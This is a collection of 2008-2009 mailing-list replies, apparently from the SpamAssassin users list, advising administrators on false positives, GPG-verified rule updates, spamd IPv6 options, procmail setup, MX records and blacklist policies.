At 01:36 15-01-2009, Rasmus Haslund wrote: implement it with the SA engine running in Icewarp Merak. Anyway we do have alot of problems with FP when we try out new things and I just have to say some things just does not work good on a large scale where you have to deal with all kinds og languages from all over the world. Antispam tools rarely works well on a large scale. SpamAssassin has not be tested with all the different languages. You have to do your own testing and make adjustments. We do business with tons of companies that are using some cheap/free mailserver on their dsl line and then thats it - these are listed in PBL and god knows where... but if we dont get their email trough it will mean large amounts of lost revenue. I constantly have to be over the system looking to see what new trends arise. Thankfully our system in There are a few people that do that as they understand that filtering requires continuous management. SpamAssassin can be quite effective even if you are communicating with companies running mail servers on their DSL line. It is commonly said around here that SpamAssassin does not block spam. The score it generates can be used to categorize the emails you receive. From there, you can block the really bad and flag what falls in between for review. One of the advantages of SpamAssassin is that it won't flag an email as spam on the basis of a PBL listing only. blocked though no explanation from them) and 2nd some customers mailserver and im not sure how they fixed it since they dont speak any language i can understand or speak so our sales rep. for them translated a bunch of stuff from me and now it seems ok. That's one of the problems when you communicate globally. If you are seeing a lot of false positives, post some samples on a web site together with the rules that were hit. Regards, -sm
Re: Temporary 'Replacements' for SaneSecurity
At 06:59 14-01-2009, Rob McEwen wrote: Because Rasmus manages a mail server where B2B mail is routinely sent/received _globally_, Rasmus is the king of finding FPs. I could be wrong, but judging from previous reports about the Botnet Plugin, I predict that Rasmus will either (a) find the Botnet Plugin utterly unusable due to FPs, or (b) only be able to score it by a point or two due to excessive FPs. (Rasmus--by all means--please don't take my word for it--try it out and then let us know what happened!) Botnet Plugin sounds like a plugin that detect botnets ... If Rasmus is finding that many false positives, then he's using the wrong tools. At 08:37 14-01-2009, Matt Garretson wrote: Is there any way that a more distributed method of delivering updates could be more resistant to DDOS attacks? E.g. trackerless bittorrents (DHT), or something along those lines? Isn't that technology certified for illegal content only? :-) Sanesecurity could have been better protected against DDOS attacks. They are a ripe target. Regards, -sm
Re: Temporary 'Replacements' for SaneSecurity
At 12:44 14-01-2009, Rob McEwen wrote: No. This is just due to the fact that, unfortunately, some mail servers and IPs (which send desired and solicited messages) are somewhat incorrectly configured. It turns out that a distributor receiving legitimate business e-mail from vendors customers in such places as Africa, South America, Asia... all over the place... is going to see a disproportionately larger amount of messages sent from IPs which either: Choosing a tool requires an understanding of what the tool can do and the task to be performed with it. We don't have to go as far as South America to to find incorrectly configured mail servers. There's currently a user on this list running one that send bounces to the wrong address. This has nothing to do with Rasmus's tools.. other than the fact that (I surmise) he is probably now forced, given that situation, back off of his scoring of DNSBls and rely more on content filtering in comparison to those whose e-mail is mostly US/Europe-based. If there is nothing wrong with Rasmus' tools, then the Botnet plugin should work for him. Now, if you are saying that the Botnet plugin should only used for those who of you who only receive mail from the US or Europe, I'll point out that it also causes false positive for that kind of mail traffic. As you mentioned above, the problem is not really with Botnet plugin if we understand that it does not detect botnets. Regards, -sm
Eudora content concentrator (was: Whitelist not working - Ugh please help)
At 22:01 08-01-2009, Evan Platt wrote: Ok, unless someone here knows, I'll ask in an Eudora group... I turned Header mode to Terse. Only shows the From, To, and subject headers. But also trims the heck out of the message. If there's a few pages of quoted text, it shows ...snip and for some reason, removes odd things, like in this case, the Nabble tag. Any ideas? The Content Concentrator replaces excessive text in the message body with snip if you use Terse mode. The footer is part of the excessive text being hidden. You can use Compact mode to reduce the effect. If you want to hide the headers only, you can use the TabooHeaders setting. Regards, -sm
Re: Whitelist not working - Ugh please help
At 18:40 08-01-2009, Evan Platt wrote: For the THIRD time, SpamAssassin is not marking the mail as Spam. Mailscanner is. You need to ask on a mailscanner list. The footer at the bottom of the original message is a hint as to why your advice won't be understood. :-) Regards, -sm
Re: A lot of spams go through, see example
At 11:06 26-12-2008, Igor Chudov wrote: http://igor.chudov.com/tmp/spam005.txt I get a lot of these, all seemingly sent by the same software and the same person, any way of filtering them out? Autolearning is categorizing that email as ham because of the zero score. Turn off autolearning or reduce the score for autolearning ham until you fix this problem. As a quick fix, add a header rule to catch the FreeCreditReports360.com in the From header. Regards, -sm
Re: [OT] GPG Signatures
At 00:55 15-12-2008, Arthur Dent wrote: I have had quite a lot of trouble getting my posts through to mailing lists (this one and others) lately. More often than not they simply never appear which makes me wonder if there is something wrong with my mail set-up (I would be grateful if someone could look at this one a let me know if I am triggering any rules...) What does the reject message say? Then today I received a bounceback message from a member of this list to a message I posted (successfully) 9 days ago. The gist of the bounceback is that my GPG signature was considered unsafe. Now, I routinely sign my messages (not this one!) because I think it is good practice, but could this be at least part of the reason why my mail doesn't get through? No. There is a subscriber rewriting the recipient address to an invalid one. The bounces are incorrectly sent to the author of the message instead of the sender. Regards, -sm
Re: Preemptive URI blocklisting
At 08:11 14-12-2008, Dave Pooser wrote: %word%%otherword%.com format and both are in the same /24. So I started checking PTR records for the whole /24 and I'm seeing snowshoe farms like this (mildly borked to not hit URI lists): 3.193.111.66.in-addr.arpaname = dancethree[dot]com. Verify the registrant information available from Whois and see whether such domains regularly appear in spam or ham. Regards, -sm
Re: sought rules updates
At 22:19 10-12-2008, LuKreme wrote: I ssh to the server and then I sudo su (so I am sure I have discarded my own login environment, I do not normally do this) mail# gpg --list-keys /etc/mail/spamassassin/sa-update-keys/pubring.gpg gpg: error reading key: No public key gpg --no-default-keyring --keyring /etc/mail/spamassassin/sa-update-keys/pubring.gpg At least on my FreeBSD, there's no man page for gpg, and the --help man gpg works for me. Riiight, but the public key I put in the keychain does all that, no? I'm still unclear on how the --gpgkey makes it more secure. If the file is signed, the signature is checked against the public key that I have in pubring.gpg. What does the gpgkey do? There may be several keys in a keyring. When running an automated process to verify a file, you also have to validate who signed the file. That's where the gpgkey comes in. Simply checking the signature is not enough. Regards, -sm
Re: sought rules updates
At 13:51 10-12-2008, LuKreme wrote: I read the man page, where there is no mention of how to obtain this number. In fact, I read many posts, and many webpages and have still not found that information. I've seen the IDs in others posts, sure, but where do they originate? sa-update uses GPG (GNU Privacy Guard) to verify the authenticity of the updates. The Sought rules webpage mentions how to download the GPG key. If you want to understand how GPG works or how to use GPG keys, you should read the GPG documentation. Even searching the wiki (which just links to the previously linked http://taint.org/2007/08/15/004348a.html )is merely a here's the random-looking digits you pass to --gpgkey and not a here's what the --gpgkey is, means, and how it's generated. The gpgkey parameter for sa-update specifies which GPG key ID should be trusted to sign the updates. You can use the gpg command to find out what the key ID is. That's not a random number; it's a hexadecimal number which identifies the key. Why doesn't sa-learn simply trust the keys that are added to its keychain without this extra (and at least for me, confusing) step? I'm starting to think the simplest way to do this is just ignore the gpg flags entirely and use --nogpg. What's the downside to this (other than the obvious DNS hijacking to point the URL to some spammer site with bad data which seems a remote enough chance to ignore). Because sa-update is designed to provide updates in a secure way. If you want the simplest way, you can ignore these steps and face the consequences when something goes wrong. Regards, -sm
Re: sought rules updates
At 20:39 10-12-2008, LuKreme wrote: And the source of that number is, evidently, a complete mystery. That's my point. I've seen lots of instructions like this: # wget http://somesite.tld/somepath/GPG.KEY # sudo sa-update --import GPG.KEY # sudo sa-update --gpgkey 0E28B3DC --channel uber.rule.somesite.tld where the '0E28B3DC' has just magically appeared as if created from the ether. Once you have imported the key, you can use gpg --list-keys to find the key ID. Do you see that there is a crucial step missing there? Where did that Yes. gpgkey value come from? If it wasn't provided in these instructions (like say you were looking for a ruleset at foo.bar.tld/GPG.KEY but hadn't yet discovered the page that had the magic hex code), how do you find it? Can you generate it. Is is simply a hash of the gpg keyfile, or something else? The key ID is the low order 64 bits of the fingerprint. It's a bit of hey, now just fill in this number we hopefully have given you. Don't worry about what it means, or how it works, or where it came from. Just copypaste and you'll be fine. Strangely enough, that does not fill me with the highest degree of confidence. Not much more so that --nogpg. That's not the right way to do it if we are concerned about trust relationships. As you said, unless you have confidence in what is published on the webpage, it's like running sa-update with the --nogpg parameter. gpgkey. I've added the key to the keychain as a trusted key, that is enough to make it secure. How is this 8 digit hex code making anything any more secure? By adding the key to the keychain, you are trusting it. The security part is that you can verify whether the signer generated the updates. Even if the host is compromised, you are safe as long as the private key is secure and the signer still has your trust. Regards, -sm
Re: [sa-list] Re: [sa-list] Re: Spamd and ipv6
At 18:23 02-12-2008, Byung-Hee HWANG wrote: Are you using FreeBSD or NetBSD? If so, i understand you. Unfortunately, SA developers do not care about IPv6 yet. So here SA program at first do action with 127.0.0.1 than ::1, i guess ;; This was tested on a BSD system. SpamAssassin developers are sharing their code for free.If we need a specific feature or find a bug, we can always send a patch. If you read the URL I posted previously, you will see that the developers have been working on IPv6 support. Regards, -sm
Re: I'm thinking about offering a free MX backup service
At 11:51 02-12-2008, Marc Perkel wrote: Tell me if you think this is a good idea. Everything that helps to promote your business is a good idea. :-) Regards, -sm
Re: [sa-list] Re: Spamd and ipv6
At 23:01 30-11-2008, Dan Mahoney, System Admin wrote: So then, you're saying the behavior for ipv4 and ipv6 is somehow different? If you start spamd without specifying the IP addresses to listen on, spamd will listen on the 127.0.0.1 IP address only. You should have the IO::Socket::INET6 and Socket6 Perl modules installed to have IPv6 support in spamd. You can start spamd as follows: spamd -i 2001:DB8:1:1::1 spamd only allows connections from 127:0.0.1. You can allow connections from other IP addresses with the -A parameter. You may have to patch Mail::SpamAssassin::NetSet. See https://issues.apache.org/SpamAssassin/show_bug.cgi?id=4964 Additionally, even when I get this working, I am unable to specify ipv6 addresses to -A, either with or without square brackets. That part of the code is IPv4 specific. Regards, -sm
Re: [sa-list] Re: [sa-list] Re: Spamd and ipv6
At 07:03 01-12-2008, Dan Mahoney, System Admin wrote: And on an ip6 enabled system, where will spamc localhost try to connect to first? 127.0.0.1 or ::1? By default, spamc connects to 127.0.0.1. On a properly configured network, it will try ::1, then 127.0.0.1. Yes, but there's no way to listen on *both* addresses -- however, it's completely possible to listen on all ip4 addresses -- I'm just looking for a switch that will say all ip4 AND all ip6. There isn't a switch for all IPv4 and all IPv6 addresses. Also, would be useful if I could specify to listen on :: or [::] (neither worked when I tried it.) Again, consistent behavior between v4 and v6 is what I'm looking for. If you specify the listen on as ::, spamd will listen on all IPv6 addresses. Listening on v6 is pointless if I can't restrict. Is the correct answer open another bug? Or from these commit messages, should I simply assume the next 3.3 will have these (I see jm's note that the patches shouldn't cleanly apply to 3.2.x.)? It's actually restricted. If you don't specify an IP address with -A, spamd will disconnect you. You won't be able to specify IPv6 addresses after the -A without the patch. You can either wait for 3.3 to be released or adapt that patch for your version of SpamAssassin. Regards, -sm
Re: Spamd and ipv6
At 21:45 30-11-2008, Dan Mahoney, System Admin wrote: Since getting my hosts natively speaking ipv6, I've been seeing a lot of initial timeouts connecting to spamc, because I believe it's apparently trying ipv6 first. spamc: connect to spamd on 2001:470:1f07:a7f::1 failed, retrying (#1 of 3): Connection refused [snip] However, I cannot get the -A systax for spamd to accept connections from a given address, nor does it appear to be listening on said address: quark# netstat -na | grep LIST | grep 783 tcp4 0 0 *.783 *.*LISTEN Use the -i parameter to specify the IPv6 address. The -A parameter to specify the host which can connect to spamd and not the IP address on which spamd should listen on. Regards, -sm
Re: IPv6 only sa-update channels?
At 19:30 28-11-2008, Daryl C. W. O'Shea wrote: As an aside, I'd be interested to know how much, if any, spam you get to your IPv6 only server. I had one for a short while a number or years ago and didn't get any mail at all. IPv6 usage depends on your environment and the user-base you are dealing with. Some educational institutions exchange a significant amount of mail over IPv6. The amount of spam is still quite low or non-existent for some. Regards, -sm
Re: SURBL Usage Policy change
At 16:58 11-11-2008, Dave Koontz wrote: Given this change in SURBL in policy and pricing, I would strongly suggest removing their rules from the SA rule base. Otherwise, you will likely get lots of complaints from users of systems that have embedded SA installs, or others who do not monitor this list. I can see many Barracuda users not having a clue why they are now being blocked and their systems are processing messages slower as a result. Most blacklists have a usage policy where you are charged if your site generates more than X queries. As the SpamAssassin rule base contains several blacklists which are pay-ware, those rules would have to be removed as well. Barracuda users being blocked is not a SpamAssassin issue. Do you want SpamAssassin to include a warning about external charges may apply if the blacklists included in the rule base are used to process more than X messages or if your site has more than Y users? Regards, -sm
Re: Spamassassin Restart and E-Mail being scanned at time of restart.
Hi Michael, At 14:45 12-11-2008, Michael Hutchinson wrote: I am wondering, what happens to E-Mail that is being scanned when the root user on the mail system restarts Spamassassin? I see lots of Spamd children before it is restarted and they suddenly all drop off on a restart (as expected) do the E-Mails being scanned at that time actually get re-scanned or do they only get partially scanned, and then delivered? It would appear that the number of child processes does not increase quickly back to what it was before suggesting the E-Mails that were being scanned at restart time do not get fully scanned Does anyone know what the score is here? SpamAssassin does content filtering only. The software interacting with SpamAssassin determines the action to take, i.e. whether to block or drop the email, etc. If spamd is restarted while an email is being scanned, the software interacting with SpamAssassin will not get a negative or positive response. The software might defer mail delivery and retry later, hence causing a rescan. Regards, -sm
Re: Accidentally Filtering through Spamassassin Twice
At 07:22 06-11-2008, Joe Dragotta wrote: I would presume that if the global procmailrc file, in /etc/, forwards mail to Spamassassin, and the users have individual .procmailrc files, in their home directories, which also forward mail to Spamassassin, any mail destined for such a user would be filtered twice. Is that a correct assumption? Yes. So I'm probably wasting resources if my Spamassassin host is configured as such? Yes. See http://wiki.apache.org/spamassassin/UsedViaProcmail for more information about calling SpamAssassin from procmail. Regards, -sm
Re: Accidentally Filtering through Spamassassin Twice
At 15:00 06-11-2008, Joe Dragotta wrote: Not being very experienced in SA administration, I didn't know if SA would process the same email twice, or if it kept track of message IDs and only processed them once. Thusly, I needed to know whether or not my originally described scenario would send the emails to SA twice, and subsequently, if SA would filter them twice; which apparently is the case. The message would be processed twice. It won't be learned twice by the Bayesian filter. SpamAssassin does content analysis. It doesn't filter messages. When you pass a message to SpamAssassin, it analyses the content and returns a score. In your case, it's procmail that does the filtering by redirecting the message. In any event, I am moving to use the spamd/c combination, in lieu of invoking SA from procmail. By using spamd, you avoid the startup overhead. spamc will pass the message to the spamd daemon and get the result. Regards, -sm
Re: prefork: oops! no idle kids in need_to_del_server?
At 10:18 02-11-2008, Per Jessen wrote: OK, this is beginning to be annoying - I've seen it 4-5 times in the last week. I'll probably have to cobble up a quick spamd auto-restart. Is no-one else running spamd and using SIGHUP for reloading the config? The configuration reloads correctly. See whether your issue is OS specific. Regards, -sm
Re: Phishing rules?
At 07:56 01-11-2008, Micah Anderson wrote: Here is an example one I received recently, note the hideously low bayes score on this one, caused it to autolearn as ham even, grr. [snip] X-Spam-Status: No, score=-3.6 required=5.0 tests=BAYES_00,RCVD_IN_DNSWL_LOW autolearn=ham version=3.2.5 The sender is whitelisted by www.dnswl.org. Received: from master.debian.org (master.debian.org [70.103.162.29]) by mx1.riseup.net (Postfix) with ESMTP id AA4465701D1 for [EMAIL PROTECTED]; Fri, 31 Oct 2008 20:00:39 -0700 (PDT) The mail is coming through debian.org. Do you want to blacklist that host? Regards, -sm
Re: Spamassassin+amavis
At 05:51 30-10-2008, Luis Hernán Otegui wrote: Just to check, you know you should run a RBL check in Postfix BEFORE it accepts te message, do you? This reduces dramatically the number of messages your server has to scan. And improves the performance a lot. You should not run RBL checks on outbound mail where the customer is relaying through your mail server. Regards, -sm
Re: Spamassassin+amavis
At 16:56 23-10-2008, Luis Croker wrote: I have a mail server with FreeBSD 7.0, postfix+amavis-new+spamassassin. We are an ISP and I need to filter the spam that our susbribers are sending to internet, the PCs have some malware or are botnets. These PCs generates a lot of spam each day. The server filters a los of Spam but some times the queue is so crowded. I have to questions... Do you have any recomendation to improve the performance on the server ?? http://wiki.apache.org/spamassassin/FasterPerformance How can I catch more spam than the seerver is filtering ? The server blocks many messages but another spam messages goes to internet cause the score does not reach the parameters to be blocked. If you are running an old version of SpamAssassin, update it. Run sa-update to keep the rules updated. Analyze SMTP traffic to detect any signs of abuse and quarantine these hosts. You may have to reach out to the customers and help them clean infected hosts. Use the feedback from your abuse department. You can also get feedback from anti-abuse groups and subscribe to feedback loops. Identify the spam messages not reaching the threshold and add rules to catch them. Regards, -sm
Re: Spamassassin+amavis
At 10:12 24-10-2008, Luis Croker wrote: I have updated the SARE rules... how often should I update them ? Daily ? It's been a while since the SARE rules have been updated. Checking for updates daily would only generate useless traffic. It's better to get the updates provided by the SpamAssassin project ( http://wiki.apache.org/spamassassin/RuleUpdates ). The sought rules ( http://wiki.apache.org/spamassassin/SoughtRules ) are quite effective in catching fresh spam messages. Regards, -sm
Re: bogusmx [Was: DNS restrictions for a mail server]
Hi Michael, At 08:58 23-10-2008, Michael Scheidell wrote: Why? Its being widely used by 'email experts' and hosted email anti-spam companies now. The section of the SMTP standard that discusses about MX records is commonly misinterpreted by some people. Even if CNAMEs are widely used, that doesn't mean that it is correct. A lot of things works 99% of the time. Quoting RFC 2182 which explains the matter: Searching for either NS or MX records causes additional section processing in which address records associated with the value of the record sought are appended to the answer. This helps avoid needless extra queries that are easily anticipated when the first was made. Additional section processing does not include CNAME records, let alone the address records that may be associated with the canonical name derived from the alias. Thus, if an alias is used as the value of an NS or MX record, no address will be returned with the NS or MX value. This can cause extra queries, and extra network burden, on every query. It is trivial for the DNS administrator to avoid this by resolving the alias and placing the canonical name directly in the affected record just once when it is updated or installed. In some particular hard cases the lack of the additional section address records in the results of a NS lookup can cause the request to fail. The SMTP standard discusses how to locate a target host and points to the above section to explain the prohibition of CNAMEs. A strict reading of the section about locating a target host shows that the behavior is undefined when CNAMEs are used. This means that you might end up with unexpected results. One can go back to the standard about mail routing to understand how mail preferences are processed to determine where a message should be delivered. That influenced the decision on discouraging CNAMEs in the data section of MX RRs. My comment is not about bogusmx or antispam; it's about how to determine in a reliable way where to deliver a message. Regards, -sm
Re: bogusmx [Was: DNS restrictions for a mail server]
At 10:29 23-10-2008, Michael Scheidell wrote: we arn't arguing rfc's, and by '99% of the time', actually, it works 100% of the time unless you use the rfc-ignorant blacklists. If it works 100% of the time for you, what can I say. I don't know if, or, since you are the expert in this, maybe you can enlighten us.. What major mail server can't deliver email to a mx record that is a cname? if there were technical problems, then the major email hosted providers would not be using it. I doubt I'm an expert. Current versions of Postfix and sendmail handle the CNAME. There are some configuration cases where sendmail may generate a delivery failure. I don't use major email hosted providers as a yardstick. There was one major email hosted provider that rejected messages if the sending domain listed an IPv6 host as one of the MX targets. I suggest that we agree to disagree as we are not arguing about the same thing. Regards, -sm
Re: DNS_FROM_SECURITYSAGE broken?
At 14:22 07-10-2008, David B Funk wrote: I recently noticed that DNS_FROM_SECURITYSAGE was hitting everything. http://issues.apache.org/SpamAssassin/show_bug.cgi?id=5672 Regards, -sm
Re: DOB blocklist seems to have very old domains
At 11:00 05-10-2008, Ralf Hildebrandt wrote: python.org is also listed: Domain Name:PYTHON.ORG Created On:27-Mar-1995 05:00:00 UTC Last Updated On:07-Sep-2006 20:50:54 UTC Expiration Date:28-Mar-2016 05:00:00 UTC It looks like a processing glitch. I sent them an email about the problem. Regards, -sm
Re: New free blacklist: BRBL - Barracuda Reputation Block List
At 11:24 23-09-2008, Kris Deugau wrote: I can't think of ANY reasons (beyond sysadmin and/or ISP incompentence) that a public IP originating legitimate SMTP traffic should not have a reverse DNS entry. (Never mind a properly-formed one, a whole other argument on its own.) There was a mailing list for a well-known open source project originating legitimate SMTP traffic for a few days from a host without reverse DNS. The reason was not sysadmin or ISP incompetence. Regards, -sm
Re: sa-update with proxy
Hi Alangchang, At 06:40 21-09-2008, Alangchang Zuuzuu wrote: Now I try to update rule of spamassassin through proxy. I inserted http://proxy:porthttp://proxy:port in /etc/wgetrc already but when I type command #sa-update -D I see this : [snip] [8931] dbg: channel: no MIRRORED.BY file available [8931] dbg: http: GET request, spamassassin.apache.org/updates/MIRRORED.BY [8931] dbg: http: request failed, retrying: 500 Can't connect to spamassassin.apache.org:80 (connect: timeout): 500 Can't connect to spamassassin.apache.org:80 (connect: timeout) sa-update does not use wget to download updates. From http://wiki.apache.org/spamassassin/RuleUpdates sa-update uses the LWP::UserAgent module, which allows certain environment variables to be set so that requests use defined proxy servers. The main one of interest is http_proxy, which should be set to an URL defining the proxy. ie: export http_proxy='http://proxy.example.com:8080/' Regards, -sm
RE: New free blacklist: BRBL - Barracuda Reputation Block List
At 03:24 22-09-2008, Chris Russell wrote: I've had servers listed on Barracuda before, despite 17 emails to their support systems we never had any response, and had to change a customers mail architecture to compensate. It's a free blacklist. People will use it until they get listed and find out that there is no way to get unlisted as the blacklist is said to be accurate or there's no delisting policy. This new free blacklist has not published its listing methodology yet. There is a removal request link. I'll wait for someone to get listed to find out whether that actually works. Regards, -sm
Re: New free blacklist: BRBL - Barracuda Reputation Block List
At 08:58 22-09-2008, Matt wrote: Everyone should block/defer ALL email with no reverse DNS. Then maybe those email admins would get a clue. Assuming you have signed up for that service, would you whitelist the sending host or wait for the postmaster to get a clue? Regards, -sm
Re: Trying out a new concept
Hi Blaine, At 17:00 22-09-2008, Blaine Fleming wrote: Honestly, on my system I have less than 0.01% hits against a list of domains registered in the last five days so I've always considered the list a failure. However, several others are reporting excellent hit rates on it. I think it is because the test is so far after everything else though. Even if your traffic patterns are different, the hit rates shouldn't be that low. There would be a difference if your MTA uses a DNSBL to reject or if you apply other pre-content filtering techniques. Regards, -sm
Re: Trobles with spamassassin
Hi Francesco, At 00:34 19-09-2008, Vincenti Francesco wrote: My system has the following characteristics: - A two nodes cluster based, active-active, one for the incoming email and the other for the outgoing email. If a node crashes, the other brings the service on its shoulders. - Each node has 4GB RAM and two processors - O.S. Fedora core 3 - Mail serverqmail 1.0.3 - Antivirus clamav 0.87.1 - Antispam spamassassin 3.0.4 - Cluster controller heartbeat - Interface qmail-scanner-queue.pl That version of SpamAssassin is quite old. Starting from the 15th of July, I find, sometimes, in the log file of qmail-scanner-queue.pl the following alert instead of normal score: SA: finished scan in 600.010015 secs - hits=?/?. I have already searched on the official site of spamassassin and it seems to be generated by some kind of trouble using the web scansion. I really used pyzor and razor2 scansion, so I took them out from local.cf. This action caused the decrease of average processing time from 15 seconds to 3.5 seconds for each treated email. But I still have some kind of web search because the system is configured to use RBL search too, and I can't take it out. The time has been improved but the problem stays! I have to write and to upgrade a local configuration file, named local_rules.cf which has reached the dimension of 250KB it is very useful to stop a lot of SPAM which is not stopped by the other rules. The problem started to appear after one of the upgrade I usually have to do, which wasn't so dramatic to justify this behaviour, I think. I gather that you have read http://wiki.apache.org/spamassassin/FasterPerformance The large local rules file will affect performance. If you want to keep pyzor and razor2, see http://wiki.apache.org/spamassassin/UsingNetworkTests on how to reduce the timeout values. Run spamd with the -D switch to find out whether there are any errors. Regards, -sm
RE: spamassassin can't rewrite subject in cpanel 11?
At 06:19 18-09-2008, Bowie Bailey wrote: This works on Outlook, but header tests were not available in Outlook Express the last time I checked. In Outlook Express, you can have a rule for the Subject line. Regards, -sm
Re: FM_FAKE_HELO_VERIZON
At 03:33 14-09-2008, jpff wrote: I have a user of a mailing list who is sending from a Verizon system, and is being marked as spam. Some is use of HTML etc but * 2.0 BOTNET_CLIENT Relay has a client-like hostname * =20 [botnet_client,ip=206.46.173.1,hostname=vms173001pub.verizon.net, ipinhostname] * 2.6 FM_FAKE_HELO_VERIZON Looks like a fake verizon.net helo. are the two that do not seem to be under control. The mailing list archive seems to be hiding teh headers at present. The first rule is not a SpamAssassin (project) rule. It incorrectly detects the hostname as a botnet client. A bug reported has been posted for the second rule. Regards, -sm
Re: MagicSpam
At 09:44 12-09-2008, Jesse Stroik wrote: setups if they want the largest possible customer base. Consider the difference between the primary goals of spamassassin and arbitrary commercial anti-spam solution: Spamassassin: To facilitate a community effort with the primary goal of accurate reduction of spam. There is SpamAssassin the project and SpamAssassin the software. The project, under the aegis of the Apache Software Foundation, provides a framework to support open source software development to deliver an enterprise-grade, freely available software product for the public benefit. SpamAssassin, the software, is a mail filter to identify spam. It is designed for easy integration into any email system. The cost to develop such a software is estimated to be around US $1.1 million. Regards, -sm